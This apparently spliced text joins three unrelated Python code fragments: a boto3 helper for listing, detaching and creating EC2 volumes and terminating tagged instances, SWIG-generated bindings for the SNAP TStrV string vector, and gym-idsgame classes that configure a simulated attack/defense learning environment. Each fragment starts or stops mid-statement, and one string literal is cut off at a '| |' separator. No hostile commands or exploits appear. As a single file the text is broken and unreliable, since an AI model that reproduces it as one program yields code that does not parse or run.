if 'Attachments' in info and len(info['Attachments']) > 0:
valid = True
for attachment in info['Attachments']:
dev_name = attachment.get('Device', None)
if dev_name is not None and dev_name in ignore_device_names:
valid = False
break
if valid:
attached[vid] = info
return attached
@classmethod
def detach_volumes(cls, volume_id=None, volume_ids=None, volume_target_tags=None, ignore_device_names=['/dev/sda1'], **kargs):
volume_infos = cls.find_attached_volumes(volume_id=volume_id, volume_ids=volume_ids, ignore_device_names=ignore_device_names)
if isinstance(volume_target_tags, dict):
volume_infos = cls.find_relevant_volumes(volume_infos=volume_infos,
target_tags=volume_target_tags, **kargs)
ec2 = cls.get_ec2(**kargs)
cls.LOGGER.info("Detaching {} volumes".format(len(volume_infos)))
detached_volumes = []
for vid in volume_infos:
try:
cls.LOGGER.debug("Detaching {}".format(vid))
ec2.detach_volume(VolumeId=vid)
detached_volumes.append(vid)
except:
cls.LOGGER.error("Failed to detach {}:\n{}".format(vid, traceback.format_exc()))
cls.LOGGER.info("Waiting for {} detached volumes".format(len(detached_volumes)))
cls.wait_for_volumes(volume_ids=detached_volumes)
return volume_infos
@classmethod
def create_volume(cls, availability_zone=None, snapshotid=None, volumetype="gp2", multiattach=False,
encrypted=False, tags=None, size=None, **kargs):
ec2 = cls.get_ec2(**kargs)
if availability_zone is None:
# grab the first one
az = cls.get_availability_zones(ec2=ec2)
if len(az) == 0:
raise Exception("Unable to get an AvailabilityZone")
availability_zone = az[0]
_kargs = {"AvailabilityZone": availability_zone,
"VolumeType": volumetype, "MultiAttachEnabled": multiattach,
"Encrypted": encrypted}
if tags:
_kargs["TagSpecifications"] = tags
if snapshotid:
_kargs["SnapshotId"] = snapshotid
if size:
_kargs["Size"] = size
# print(_kargs)
if snapshotid:
cls.LOGGER.info("Creating volume ({}:{}) using {} in {}".format(volumetype, size, snapshotid, availability_zone, ))
else:
cls.LOGGER.info("Creating volume ({}:{}) in {} for".format(volumetype, size, availability_zone))
rsp = ec2.create_volume(**_kargs)
# print(rsp)
if 'VolumeId' in rsp:
return rsp['VolumeId']
return None
@classmethod
def check_for_instances_up(cls, instances, **kargs):
ec2 = cls.get_ec2(**kargs)
instances_completed_loading = []
statuses = ec2.describe_instance_status(InstanceIds=instances)
for status in statuses['InstanceStatuses']:
instance_id = status['InstanceId']
if status['InstanceState']['Code'] != 16:
continue
if status['InstanceStatus']['Status'] != 'ok':
continue
if status['SystemStatus']['Status'] != 'ok':
continue
instances_completed_loading.append(instance_id)
return instances_completed_loading
@classmethod
def extract_public_ips(cls, instance_infos):
instance_to_ip = {k['InstanceId']: k.get('PublicIpAddress', '') for k in instance_infos}
return instance_to_ip
@classmethod
def get_instances_zone(cls, instance_ids=None, **kargs):
instance_infos = cls.get_instance_infos(instance_ids=instance_ids, **kargs)
ii_az = {}
for x in instance_infos:
az = x['Placement']['AvailabilityZone']
ii_az[x['InstanceId']] = az
return ii_az
@classmethod
def get_instance_infos_zone(cls, instance_infos=None, **kargs):
if instance_infos is None:
instance_infos = cls.get_instance_infos(**kargs)
ii_az = {}
for x in instance_infos:
az = x['Placement']['AvailabilityZone']
ii_az[x['InstanceId']] = az
return ii_az
@classmethod
def get_instance_infos(cls, instance_ids=None, **kargs):
instance_infos = []
ec2 = cls.get_ec2(**kargs)
results = None
if instance_ids is None or len(instance_ids) == 0:
results = ec2.describe_instances()
else:
results = ec2.describe_instances(InstanceIds=instance_ids)
if results is None:
return None
for k in results['Reservations']:
instance_infos = instance_infos + k['Instances']
return instance_infos
@classmethod
def get_instance_public_ips(cls, instance_ids, **kargs):
instance_infos = cls.get_instance_infos(instance_ids, **kargs)
return cls.extract_public_ips(instance_infos)
@classmethod
def find_relevant_instances(cls, target_tags: dict=None, **kargs):
target_tags = target_tags if target_tags else {}
relevant_instances = {}
instance_infos = cls.get_instance_infos()
for instance in instance_infos:
tags = instance.get('Tags', None)
instance_id = instance['InstanceId']
public_ip = instance.get('PublicIpAddress', '')
if tags is None:
continue
d_tags = {tag.get('Key', ''):tag.get('Value', '') for tag in tags }
matching = {k:v for k, v in target_tags.items() if k in d_tags and v == d_tags[k]}
if len(matching) == len(target_tags):
matching['public_ip'] = public_ip
relevant_instances[instance_id] = matching
return relevant_instances
@classmethod
def find_relevant_volumes(cls, target_tags: dict=None, volume_infos=None, **kargs):
target_tags = target_tags if target_tags else {}
relevant_volumes = {}
volume_infos = cls.get_volumes() if volume_infos is None else volume_infos
for vid, vinfo in volume_infos.items():
tags = vinfo.get('Tags', None)
volume_id = vinfo['VolumeId']
if tags is None:
continue
d_tags = {tag.get('Key', ''):tag.get('Value', '') for tag in tags }
matching = {k:v for k, v in target_tags.items() if k in d_tags and v == d_tags[k]}
if len(matching) == len(target_tags):
relevant_volumes[volume_id] = matching
return relevant_volumes
@classmethod
def get_instances(cls, instance_id=None, instance_ids=None, target_tags=None, **kargs):
ec2 = cls.get_ec2(**kargs)
if instance_ids is None:
instance_ids = []
if instance_id is not None and instance_id not in instance_ids:
instance_ids.append(instance_id)
instances = {}
instance_infos = cls.get_instance_infos(instance_ids=instance_ids, **kargs)
instances = {k['InstanceId']: k for k in instance_infos }
if target_tags:
if not 'ec2' in kargs:
kargs['ec2'] = ec2
x = cls.find_relevant_instances(target_tags=target_tags, **kargs)
if len(x) > 0:
r = ec2.describe_instances(InstanceIds=[i for i in x])
instance_infos = []
for k in r['Reservations']:
instance_infos = instance_infos + k['Instances']
instances.update({k['InstanceId']: k for k in instance_infos })
return instances
@classmethod
def find_relevant_instances_multiple_regions(cls, target_tags: dict=None, regions=REGIONS, **kargs):
target_tags = target_tags if target_tags else {}
relevant_instances = []
for region in regions:
kargs['region'] = region
cls.set_region(region)
instances = cls.find_relevant_instances(target_tags=target_tags, **kargs)
relevant_instances.append({'region': region, 'instances': instances})
return relevant_instances
@classmethod
def find_relevant_volumes_multiple_regions(cls, target_tags: dict=None, regions=REGIONS, **kargs):
target_tags = target_tags if target_tags else {}
relevant_instances = []
for region in regions:
kargs['region'] = region
cls.set_region(region)
volumes = cls.find_relevant_volumes(target_tags=target_tags, **kargs)
relevant_instances.append({'region': region, 'volumes': volumes})
return relevant_instances
@classmethod
def terminate_relevant_instances(cls, instance_ids=None, instance_id=None, target_tags: dict=None, dry_run=True, **kargs):
if instance_ids is None:
instance_ids = []
if instance_id not in instance_ids:
instance_ids.append(instance_id)
if len(instance_ids) == 0 and (target_tags is None or len(target_tags) == 0):
cls.LOGGER.critical("WARNING: Must provide tags to filter out instances, or this will destroy the environment")
raise Exception("Must provide tags to filter out instances, or this will destroy the environment")
instances = cls.get_instances(instance_ids=instance_id, target_tags=target_tags, **kargs)
if len(instances) == 0 and len(instance_ids) == 0:
return instances
ec2 = cls.get_ec2(**kargs)
instance_ids = [i for i in instances]
try:
cls.LOGGER.debug("Attempting to terminate {} instances.".format(len(instance_ids)))
ec2.terminate_instances(DryRun=dry_run, InstanceIds=instance_ids)
cls.LOGGER.info("Terminated {} instances.".format(len(instance_ids)))
except KeyboardInterrupt:
cls.LOGGER.error("Failed to terminate {} instances.".format(len(instance_ids)))
except:
cls.LOGGER.error("{}".format(traceback.format_exc()))
return instances
@classmethod
def delete_relevant_volumes(cls, target_tags: dict=None, dry_run=True, **kargs):
if target_tags is None or len(target_tags) == 0:
cls.LOGGER.critical("WARNING: Must provide tags to filter out instances, or this | |
"""
PrevPerm(TStrV self) -> bool
Parameters:
self: TVec< TStr,int > *
"""
return _snap.TStrV_PrevPerm(self)
def GetPivotValN(self, *args):
"""
GetPivotValN(TStrV self, int const & LValN, int const & RValN) -> int
Parameters:
LValN: int const &
RValN: int const &
"""
return _snap.TStrV_GetPivotValN(self, *args)
def BSort(self, *args):
"""
BSort(TStrV self, int const & MnLValN, int const & MxRValN, bool const & Asc)
Parameters:
MnLValN: int const &
MxRValN: int const &
Asc: bool const &
"""
return _snap.TStrV_BSort(self, *args)
def ISort(self, *args):
"""
ISort(TStrV self, int const & MnLValN, int const & MxRValN, bool const & Asc)
Parameters:
MnLValN: int const &
MxRValN: int const &
Asc: bool const &
"""
return _snap.TStrV_ISort(self, *args)
def Partition(self, *args):
"""
Partition(TStrV self, int const & MnLValN, int const & MxRValN, bool const & Asc) -> int
Parameters:
MnLValN: int const &
MxRValN: int const &
Asc: bool const &
"""
return _snap.TStrV_Partition(self, *args)
def QSort(self, *args):
"""
QSort(TStrV self, int const & MnLValN, int const & MxRValN, bool const & Asc)
Parameters:
MnLValN: int const &
MxRValN: int const &
Asc: bool const &
"""
return _snap.TStrV_QSort(self, *args)
def Sort(self, Asc=True):
"""
Sort(TStrV self, bool const & Asc=True)
Parameters:
Asc: bool const &
Sort(TStrV self)
Parameters:
self: TVec< TStr,int > *
"""
return _snap.TStrV_Sort(self, Asc)
def IsSorted(self, Asc=True):
"""
IsSorted(TStrV self, bool const & Asc=True) -> bool
Parameters:
Asc: bool const &
IsSorted(TStrV self) -> bool
Parameters:
self: TVec< TStr,int > const *
"""
return _snap.TStrV_IsSorted(self, Asc)
def Shuffle(self, *args):
"""
Shuffle(TStrV self, TRnd Rnd)
Parameters:
Rnd: TRnd &
"""
return _snap.TStrV_Shuffle(self, *args)
def Reverse(self, *args):
"""
Reverse(TStrV self)
Reverse(TStrV self, int LValN, int RValN)
Parameters:
LValN: int
RValN: int
"""
return _snap.TStrV_Reverse(self, *args)
def Merge(self):
"""
Merge(TStrV self)
Parameters:
self: TVec< TStr,int > *
"""
return _snap.TStrV_Merge(self)
def Intrs(self, *args):
"""
Intrs(TStrV self, TStrV ValV)
Parameters:
ValV: TVec< TStr,int > const &
Intrs(TStrV self, TStrV ValV, TStrV DstValV)
Parameters:
ValV: TVec< TStr,int > const &
DstValV: TVec< TStr,int > &
"""
return _snap.TStrV_Intrs(self, *args)
def Union(self, *args):
"""
Union(TStrV self, TStrV ValV)
Parameters:
ValV: TVec< TStr,int > const &
Union(TStrV self, TStrV ValV, TStrV DstValV)
Parameters:
ValV: TVec< TStr,int > const &
DstValV: TVec< TStr,int > &
"""
return _snap.TStrV_Union(self, *args)
def Diff(self, *args):
"""
Diff(TStrV self, TStrV ValV)
Parameters:
ValV: TVec< TStr,int > const &
Diff(TStrV self, TStrV ValV, TStrV DstValV)
Parameters:
ValV: TVec< TStr,int > const &
DstValV: TVec< TStr,int > &
"""
return _snap.TStrV_Diff(self, *args)
def IntrsLen(self, *args):
"""
IntrsLen(TStrV self, TStrV ValV) -> int
Parameters:
ValV: TVec< TStr,int > const &
"""
return _snap.TStrV_IntrsLen(self, *args)
def UnionLen(self, *args):
"""
UnionLen(TStrV self, TStrV ValV) -> int
Parameters:
ValV: TVec< TStr,int > const &
"""
return _snap.TStrV_UnionLen(self, *args)
def Count(self, *args):
"""
Count(TStrV self, TStr Val) -> int
Parameters:
Val: TStr const &
"""
return _snap.TStrV_Count(self, *args)
def SearchBin(self, *args):
"""
SearchBin(TStrV self, TStr Val) -> int
Parameters:
Val: TStr const &
SearchBin(TStrV self, TStr Val, int & InsValN) -> int
Parameters:
Val: TStr const &
InsValN: int &
"""
return _snap.TStrV_SearchBin(self, *args)
def SearchForw(self, *args):
"""
SearchForw(TStrV self, TStr Val, int const & BValN=0) -> int
Parameters:
Val: TStr const &
BValN: int const &
SearchForw(TStrV self, TStr Val) -> int
Parameters:
Val: TStr const &
"""
return _snap.TStrV_SearchForw(self, *args)
def SearchBack(self, *args):
"""
SearchBack(TStrV self, TStr Val) -> int
Parameters:
Val: TStr const &
"""
return _snap.TStrV_SearchBack(self, *args)
def SearchVForw(self, *args):
"""
SearchVForw(TStrV self, TStrV ValV, int const & BValN=0) -> int
Parameters:
ValV: TVec< TStr,int > const &
BValN: int const &
SearchVForw(TStrV self, TStrV ValV) -> int
Parameters:
ValV: TVec< TStr,int > const &
"""
return _snap.TStrV_SearchVForw(self, *args)
def IsIn(self, *args):
"""
IsIn(TStrV self, TStr Val) -> bool
Parameters:
Val: TStr const &
IsIn(TStrV self, TStr Val, int & ValN) -> bool
Parameters:
Val: TStr const &
ValN: int &
"""
return _snap.TStrV_IsIn(self, *args)
def IsInBin(self, *args):
"""
IsInBin(TStrV self, TStr Val) -> bool
Parameters:
Val: TStr const &
"""
return _snap.TStrV_IsInBin(self, *args)
def GetDat(self, *args):
"""
GetDat(TStrV self, TStr Val) -> TStr
Parameters:
Val: TStr const &
"""
return _snap.TStrV_GetDat(self, *args)
def GetAddDat(self, *args):
"""
GetAddDat(TStrV self, TStr Val) -> TStr
Parameters:
Val: TStr const &
"""
return _snap.TStrV_GetAddDat(self, *args)
def GetMxValN(self):
"""
GetMxValN(TStrV self) -> int
Parameters:
self: TVec< TStr,int > const *
"""
return _snap.TStrV_GetMxValN(self)
def GetV(*args):
"""
GetV(TStr Val1) -> TStrV
Parameters:
Val1: TStr const &
GetV(TStr Val1, TStr Val2) -> TStrV
Parameters:
Val1: TStr const &
Val2: TStr const &
GetV(TStr Val1, TStr Val2, TStr Val3) -> TStrV
Parameters:
Val1: TStr const &
Val2: TStr const &
Val3: TStr const &
GetV(TStr Val1, TStr Val2, TStr Val3, TStr Val4) -> TStrV
Parameters:
Val1: TStr const &
Val2: TStr const &
Val3: TStr const &
Val4: TStr const &
GetV(TStr Val1, TStr Val2, TStr Val3, TStr Val4, TStr Val5) -> TStrV
Parameters:
Val1: TStr const &
Val2: TStr const &
Val3: TStr const &
Val4: TStr const &
Val5: TStr const &
GetV(TStr Val1, TStr Val2, TStr Val3, TStr Val4, TStr Val5, TStr Val6) -> TStrV
Parameters:
Val1: TStr const &
Val2: TStr const &
Val3: TStr const &
Val4: TStr const &
Val5: TStr const &
Val6: TStr const &
GetV(TStr Val1, TStr Val2, TStr Val3, TStr Val4, TStr Val5, TStr Val6, TStr Val7) -> TStrV
Parameters:
Val1: TStr const &
Val2: TStr const &
Val3: TStr const &
Val4: TStr const &
Val5: TStr const &
Val6: TStr const &
Val7: TStr const &
GetV(TStr Val1, TStr Val2, TStr Val3, TStr Val4, TStr Val5, TStr Val6, TStr Val7, TStr Val8) -> TStrV
Parameters:
Val1: TStr const &
Val2: TStr const &
Val3: TStr const &
Val4: TStr const &
Val5: TStr const &
Val6: TStr const &
Val7: TStr const &
Val8: TStr const &
GetV(TStr Val1, TStr Val2, TStr Val3, TStr Val4, TStr Val5, TStr Val6, TStr Val7, TStr Val8,
TStr Val9) -> TStrV
Parameters:
Val1: TStr const &
Val2: TStr const &
Val3: TStr const &
Val4: TStr const &
Val5: TStr const &
Val6: TStr const &
Val7: TStr const &
Val8: TStr const &
Val9: TStr const &
"""
return _snap.TStrV_GetV(*args)
GetV = staticmethod(GetV)
TStrV.Load = new_instancemethod(_snap.TStrV_Load,None,TStrV)
TStrV.Save = new_instancemethod(_snap.TStrV_Save,None,TStrV)
TStrV.LoadXml = new_instancemethod(_snap.TStrV_LoadXml,None,TStrV)
TStrV.SaveXml = new_instancemethod(_snap.TStrV_SaveXml,None,TStrV)
TStrV.__add__ = new_instancemethod(_snap.TStrV___add__,None,TStrV)
TStrV.__eq__ = new_instancemethod(_snap.TStrV___eq__,None,TStrV)
TStrV.__lt__ = new_instancemethod(_snap.TStrV___lt__,None,TStrV)
TStrV.GetMemUsed = new_instancemethod(_snap.TStrV_GetMemUsed,None,TStrV)
TStrV.GetMemSize = new_instancemethod(_snap.TStrV_GetMemSize,None,TStrV)
TStrV.GetPrimHashCd = new_instancemethod(_snap.TStrV_GetPrimHashCd,None,TStrV)
TStrV.GetSecHashCd = new_instancemethod(_snap.TStrV_GetSecHashCd,None,TStrV)
TStrV.Gen = new_instancemethod(_snap.TStrV_Gen,None,TStrV)
TStrV.GenExt = new_instancemethod(_snap.TStrV_GenExt,None,TStrV)
TStrV.IsExt = new_instancemethod(_snap.TStrV_IsExt,None,TStrV)
TStrV.Reserve = new_instancemethod(_snap.TStrV_Reserve,None,TStrV)
TStrV.Clr = new_instancemethod(_snap.TStrV_Clr,None,TStrV)
TStrV.Trunc = new_instancemethod(_snap.TStrV_Trunc,None,TStrV)
TStrV.Pack = new_instancemethod(_snap.TStrV_Pack,None,TStrV)
TStrV.MoveFrom = new_instancemethod(_snap.TStrV_MoveFrom,None,TStrV)
TStrV.Empty = new_instancemethod(_snap.TStrV_Empty,None,TStrV)
TStrV.Len = new_instancemethod(_snap.TStrV_Len,None,TStrV)
TStrV.Reserved = new_instancemethod(_snap.TStrV_Reserved,None,TStrV)
TStrV.Last = new_instancemethod(_snap.TStrV_Last,None,TStrV)
TStrV.LastValN = new_instancemethod(_snap.TStrV_LastValN,None,TStrV)
TStrV.LastLast = new_instancemethod(_snap.TStrV_LastLast,None,TStrV)
TStrV.BegI = new_instancemethod(_snap.TStrV_BegI,None,TStrV)
TStrV.EndI = new_instancemethod(_snap.TStrV_EndI,None,TStrV)
TStrV.GetI = new_instancemethod(_snap.TStrV_GetI,None,TStrV)
TStrV.AddV = new_instancemethod(_snap.TStrV_AddV,None,TStrV)
TStrV.AddSorted = new_instancemethod(_snap.TStrV_AddSorted,None,TStrV)
TStrV.AddBackSorted = new_instancemethod(_snap.TStrV_AddBackSorted,None,TStrV)
TStrV.AddVMerged = new_instancemethod(_snap.TStrV_AddVMerged,None,TStrV)
TStrV.AddUnique = new_instancemethod(_snap.TStrV_AddUnique,None,TStrV)
TStrV.GetVal = new_instancemethod(_snap.TStrV_GetVal,None,TStrV)
TStrV.GetSubValV = new_instancemethod(_snap.TStrV_GetSubValV,None,TStrV)
TStrV.Ins = new_instancemethod(_snap.TStrV_Ins,None,TStrV)
TStrV.Del = new_instancemethod(_snap.TStrV_Del,None,TStrV)
TStrV.DelLast = new_instancemethod(_snap.TStrV_DelLast,None,TStrV)
TStrV.DelIfIn = new_instancemethod(_snap.TStrV_DelIfIn,None,TStrV)
TStrV.DelAll = new_instancemethod(_snap.TStrV_DelAll,None,TStrV)
TStrV.PutAll = new_instancemethod(_snap.TStrV_PutAll,None,TStrV)
TStrV.Swap = new_instancemethod(_snap.TStrV_Swap,None,TStrV)
TStrV.NextPerm = new_instancemethod(_snap.TStrV_NextPerm,None,TStrV)
TStrV.PrevPerm = new_instancemethod(_snap.TStrV_PrevPerm,None,TStrV)
TStrV.GetPivotValN = new_instancemethod(_snap.TStrV_GetPivotValN,None,TStrV)
TStrV.BSort = new_instancemethod(_snap.TStrV_BSort,None,TStrV)
TStrV.ISort = new_instancemethod(_snap.TStrV_ISort,None,TStrV)
TStrV.Partition = new_instancemethod(_snap.TStrV_Partition,None,TStrV)
TStrV.QSort = new_instancemethod(_snap.TStrV_QSort,None,TStrV)
TStrV.Sort = new_instancemethod(_snap.TStrV_Sort,None,TStrV)
TStrV.IsSorted = new_instancemethod(_snap.TStrV_IsSorted,None,TStrV)
TStrV.Shuffle = new_instancemethod(_snap.TStrV_Shuffle,None,TStrV)
TStrV.Reverse = new_instancemethod(_snap.TStrV_Reverse,None,TStrV)
TStrV.Merge = new_instancemethod(_snap.TStrV_Merge,None,TStrV)
TStrV.Intrs = new_instancemethod(_snap.TStrV_Intrs,None,TStrV)
TStrV.Union = new_instancemethod(_snap.TStrV_Union,None,TStrV)
TStrV.Diff = new_instancemethod(_snap.TStrV_Diff,None,TStrV)
TStrV.IntrsLen = new_instancemethod(_snap.TStrV_IntrsLen,None,TStrV)
TStrV.UnionLen = new_instancemethod(_snap.TStrV_UnionLen,None,TStrV)
TStrV.Count = new_instancemethod(_snap.TStrV_Count,None,TStrV)
TStrV.SearchBin = new_instancemethod(_snap.TStrV_SearchBin,None,TStrV)
TStrV.SearchForw = new_instancemethod(_snap.TStrV_SearchForw,None,TStrV)
TStrV.SearchBack = new_instancemethod(_snap.TStrV_SearchBack,None,TStrV)
TStrV.SearchVForw = new_instancemethod(_snap.TStrV_SearchVForw,None,TStrV)
TStrV.IsIn = new_instancemethod(_snap.TStrV_IsIn,None,TStrV)
TStrV.IsInBin = new_instancemethod(_snap.TStrV_IsInBin,None,TStrV)
TStrV.GetDat = new_instancemethod(_snap.TStrV_GetDat,None,TStrV)
TStrV.GetAddDat = new_instancemethod(_snap.TStrV_GetAddDat,None,TStrV)
TStrV.GetMxValN = new_instancemethod(_snap.TStrV_GetMxValN,None,TStrV)
TStrV_swigregister = _snap.TStrV_swigregister
TStrV_swigregister(TStrV)
def TStrV_SwapI(*args):
"""
TStrV_SwapI(TStr LVal, TStr RVal)
Parameters:
LVal: TVec< TStr,int >::TIter
RVal: TVec< TStr,int >::TIter
"""
return _snap.TStrV_SwapI(*args)
def TStrV_GetV(*args):
"""
GetV(TStr Val1) -> TStrV
Parameters:
Val1: TStr const &
GetV(TStr Val1, TStr Val2) -> TStrV
Parameters:
Val1: TStr const &
Val2: TStr const &
GetV(TStr Val1, TStr Val2, TStr Val3) -> TStrV
Parameters:
Val1: TStr const &
Val2: TStr const &
Val3: TStr const &
GetV(TStr Val1, TStr Val2, TStr Val3, TStr Val4) -> TStrV
Parameters:
Val1: TStr const &
Val2: TStr const &
Val3: TStr const &
Val4: TStr const &
GetV(TStr Val1, TStr Val2, TStr Val3, TStr Val4, TStr Val5) -> TStrV
Parameters:
Val1: TStr const &
Val2: TStr const &
Val3: TStr const &
Val4: TStr const &
| |
is None:
game_config = GameConfig(num_layers=4, num_servers_per_layer=5, num_attack_types=10, max_value=9)
game_config.set_initial_state(defense_val=2, attack_val=0, num_vulnerabilities_per_node=1, det_val=2,
vulnerability_val=0, num_vulnerabilities_per_layer=5)
if initial_state_path is not None:
game_config.set_load_initial_state(initial_state_path)
attacker_agent = AttackMaximalValueBotAgent(game_config, self)
idsgame_config = IdsGameConfig(game_config=game_config, attacker_agent=attacker_agent)
idsgame_config.render_config.caption = "idsgame-maximal_attack-v4"
super().__init__(idsgame_config=idsgame_config, save_dir=save_dir)
class IdsGameV4Env(AttackDefenseEnv):
"""
[AttackDefenseEnv] 4 layer, 5 servers per layer, 10 attack-defense-values
[Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0
[Rewards] Sparse
[Version] 4
[Observations] partially observed
[Environment] Deterministic
[Attacker Starting Position] Start node
[Reconnaissance activities] disabled
[Reconnaissance bool features] No
"""
def __init__(self, idsgame_config: IdsGameConfig = None, save_dir: str = None, initial_state_path: str = None):
"""
Initialization of the environment
:param save_dir: directory to save outputs of the env
:param initial_state_path: path to the initial state (if none, use default)
:param idsgame_config: configuration of the environment (if not specified a default config is used)
"""
if idsgame_config is None:
game_config = GameConfig(num_layers=4, num_servers_per_layer=5, num_attack_types=10, max_value=9)
game_config.set_initial_state(defense_val=2, attack_val=0, num_vulnerabilities_per_node=1, det_val=2,
vulnerability_val=0, num_vulnerabilities_per_layer=5)
if initial_state_path is not None:
game_config.set_load_initial_state(initial_state_path)
idsgame_config = IdsGameConfig(game_config=game_config)
idsgame_config.render_config.caption = "idsgame-v4"
super().__init__(idsgame_config=idsgame_config, save_dir=save_dir)
# -------- Version 5 ------------
class IdsGameRandomDefenseV5Env(AttackerEnv):
"""
[AttackerEnv] 4 layers, 5 servers per layer, 10 attack-defense-values, random defender, connected layers
[Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0
[Rewards] Sparse
[Version] 5
[Observations] partially observed
[Environment] Deterministic
[Attacker Starting Position] Start node
[Reconnaissance activities] disabled
[Reconnaissance bool features] No
"""
def __init__(self, idsgame_config: IdsGameConfig = None, save_dir: str = None, initial_state_path: str = None):
"""
Initialization of the environment
:param save_dir: directory to save outputs of the env
:param initial_state_path: path to the initial state (if none, use default)
:param idsgame_config: configuration of the environment (if not specified a default config is used)
"""
from gym_idsgame.agents.bot_agents.random_defense_bot_agent import RandomDefenseBotAgent
if idsgame_config is None:
game_config = GameConfig(num_layers=4, num_servers_per_layer=5, num_attack_types=10, max_value=9)
game_config.set_initial_state(defense_val=2, attack_val=0, num_vulnerabilities_per_node=1, det_val=2,
vulnerability_val=0, num_vulnerabilities_per_layer=2)
game_config.network_config = NetworkConfig(game_config.num_rows, game_config.num_cols,
connected_layers=True)
if initial_state_path is not None:
game_config.set_load_initial_state(initial_state_path)
defender_agent = RandomDefenseBotAgent(game_config)
idsgame_config = IdsGameConfig(game_config=game_config, defender_agent=defender_agent)
idsgame_config.render_config.caption = "idsgame-random_defense-v5"
super().__init__(idsgame_config=idsgame_config, save_dir=save_dir)
class IdsGameMinimalDefenseV5Env(AttackerEnv):
"""
[AttackerEnv] 4 layers, 5 servers per layer, 10 attack-defense-values,
defender following the "defend minimal strategy", connected layers
[Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0
[Rewards] Sparse
[Version] 5
[Observations] partially observed
[Environment] Deterministic
[Attacker Starting Position] Start node
[Reconnaissance activities] disabled
[Reconnaissance bool features] No
"""
def __init__(self, idsgame_config: IdsGameConfig = None, save_dir: str = None, initial_state_path: str = None):
"""
Initialization of the environment
:param save_dir: directory to save outputs of the env
:param initial_state_path: path to the initial state (if none, use default)
:param idsgame_config: configuration of the environment (if not specified a default config is used)
"""
from gym_idsgame.agents.bot_agents.defend_minimal_value_bot_agent import DefendMinimalValueBotAgent
if idsgame_config is None:
game_config = GameConfig(num_layers=4, num_servers_per_layer=5, num_attack_types=10, max_value=9)
game_config.set_initial_state(defense_val=2, attack_val=0, num_vulnerabilities_per_node=1, det_val=2,
vulnerability_val=0, num_vulnerabilities_per_layer=2)
game_config.network_config = NetworkConfig(game_config.num_rows, game_config.num_cols,
connected_layers=True)
if initial_state_path is not None:
game_config.set_load_initial_state(initial_state_path)
defender_agent = DefendMinimalValueBotAgent(game_config)
idsgame_config = IdsGameConfig(game_config=game_config, defender_agent=defender_agent)
idsgame_config.render_config.caption = "idsgame-minimal_defense-v5"
super().__init__(idsgame_config=idsgame_config, save_dir=save_dir)
class IdsGameRandomAttackV5Env(DefenderEnv):
"""
[DefenderEnv] 4 layers, 5 servers per layer, 10 attack-defense-values, random attacker, connected layers
[Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0
[Rewards] Sparse
[Version] 5
[Observations] partially observed
[Environment] Deterministic
[Attacker Starting Position] Start node
[Reconnaissance activities] disabled
[Reconnaissance bool features] No
"""
def __init__(self, idsgame_config: IdsGameConfig = None, save_dir: str = None, initial_state_path: str = None):
"""
Initialization of the environment
:param save_dir: directory to save outputs of the env
:param initial_state_path: path to the initial state (if none, use default)
:param idsgame_config: configuration of the environment (if not specified a default config is used)
"""
from gym_idsgame.agents.bot_agents.random_attack_bot_agent import RandomAttackBotAgent
if idsgame_config is None:
game_config = GameConfig(num_layers=4, num_servers_per_layer=5, num_attack_types=10, max_value=9)
game_config.set_initial_state(defense_val=2, attack_val=0, num_vulnerabilities_per_node=1, det_val=2,
vulnerability_val=0, num_vulnerabilities_per_layer=2)
game_config.network_config = NetworkConfig(game_config.num_rows, game_config.num_cols,
connected_layers=True)
if initial_state_path is not None:
game_config.set_load_initial_state(initial_state_path)
attacker_agent = RandomAttackBotAgent(game_config, self)
idsgame_config = IdsGameConfig(game_config=game_config, attacker_agent=attacker_agent)
idsgame_config.render_config.caption = "idsgame-random_attack-v5"
super().__init__(idsgame_config=idsgame_config, save_dir=save_dir)
class IdsGameMaximalAttackV5Env(DefenderEnv):
"""
[DefenderEnv] 4 layers, 5 servers per layer, 10 attack-defense-values,
attacker following the "attack maximal strategy", connected layers
[Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0
[Rewards] Sparse
[Version] 5
[Observations] partially observed
[Environment] Deterministic
[Attacker Starting Position] Start node
[Reconnaissance activities] disabled
[Reconnaissance bool features] No
"""
def __init__(self, idsgame_config: IdsGameConfig = None, save_dir: str = None, initial_state_path: str = None):
"""
Initialization of the environment
:param save_dir: directory to save outputs of the env
:param initial_state_path: path to the initial state (if none, use default)
:param idsgame_config: configuration of the environment (if not specified a default config is used)
"""
from gym_idsgame.agents.bot_agents.attack_maximal_value_bot_agent import AttackMaximalValueBotAgent
if idsgame_config is None:
game_config = GameConfig(num_layers=4, num_servers_per_layer=5, num_attack_types=10, max_value=9)
game_config.set_initial_state(defense_val=2, attack_val=0, num_vulnerabilities_per_node=1, det_val=2,
vulnerability_val=0, num_vulnerabilities_per_layer=2)
game_config.network_config = NetworkConfig(game_config.num_rows, game_config.num_cols,
connected_layers=True)
if initial_state_path is not None:
game_config.set_load_initial_state(initial_state_path)
attacker_agent = AttackMaximalValueBotAgent(game_config, self)
idsgame_config = IdsGameConfig(game_config=game_config, attacker_agent=attacker_agent)
idsgame_config.render_config.caption = "idsgame-maximal_attack-v5"
super().__init__(idsgame_config=idsgame_config, save_dir=save_dir)
class IdsGameV5Env(AttackDefenseEnv):
"""
[AttackDefenseEnv] 4 layer, 5 servers per layer, 10 attack-defense-values, connected layers
[Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0
[Rewards] Sparse
[Version] 5
[Observations] partially observed
[Environment] Deterministic
[Attacker Starting Position] Start node
[Reconnaissance activities] disabled
[Reconnaissance bool features] No
"""
def __init__(self, idsgame_config: IdsGameConfig = None, save_dir: str = None, initial_state_path: str = None):
"""
Initialization of the environment
:param save_dir: directory to save outputs of the env
:param initial_state_path: path to the initial state (if none, use default)
:param idsgame_config: configuration of the environment (if not specified a default config is used)
"""
if idsgame_config is None:
game_config = GameConfig(num_layers=4, num_servers_per_layer=5, num_attack_types=10, max_value=9)
game_config.set_initial_state(defense_val=2, attack_val=0, num_vulnerabilities_per_node=1, det_val=2,
vulnerability_val=0, num_vulnerabilities_per_layer=2)
game_config.network_config = NetworkConfig(game_config.num_rows, game_config.num_cols,
connected_layers=True)
if initial_state_path is not None:
game_config.set_load_initial_state(initial_state_path)
idsgame_config = IdsGameConfig(game_config=game_config)
